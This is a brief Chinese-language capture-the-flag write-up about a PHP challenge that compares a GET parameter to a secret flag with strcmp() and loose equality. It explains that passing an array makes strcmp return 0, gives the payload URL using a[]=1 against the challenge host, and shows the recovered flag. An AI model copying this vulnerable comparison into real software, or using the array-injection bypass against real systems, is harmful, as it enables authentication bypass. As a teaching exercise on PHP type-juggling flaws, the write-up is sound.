<?php
$flag = "flag{xxxxx}";
if (isset($_GET['a'])) {
if (strcmp($_GET['a'], $flag) == 0)
//如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。
//比较两个字符串(区分大小写)
die('Flag: '.$flag);
else
print 'No';
}
?>
strcmp(str1,str2)
如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。
比较两个字符串(区分大小写)
如果我们传入非字符串类型的数据的时候(数组),这个函数将发生错误,并且返回数值 0
在5.3之前的php中,显示了报错的警告信息后,返回数值0
我们可以构造payload
http://123.206.87.240:9009/6.php?a[]=1
得到flag
Flag: flag{bugku_dmsj_912k}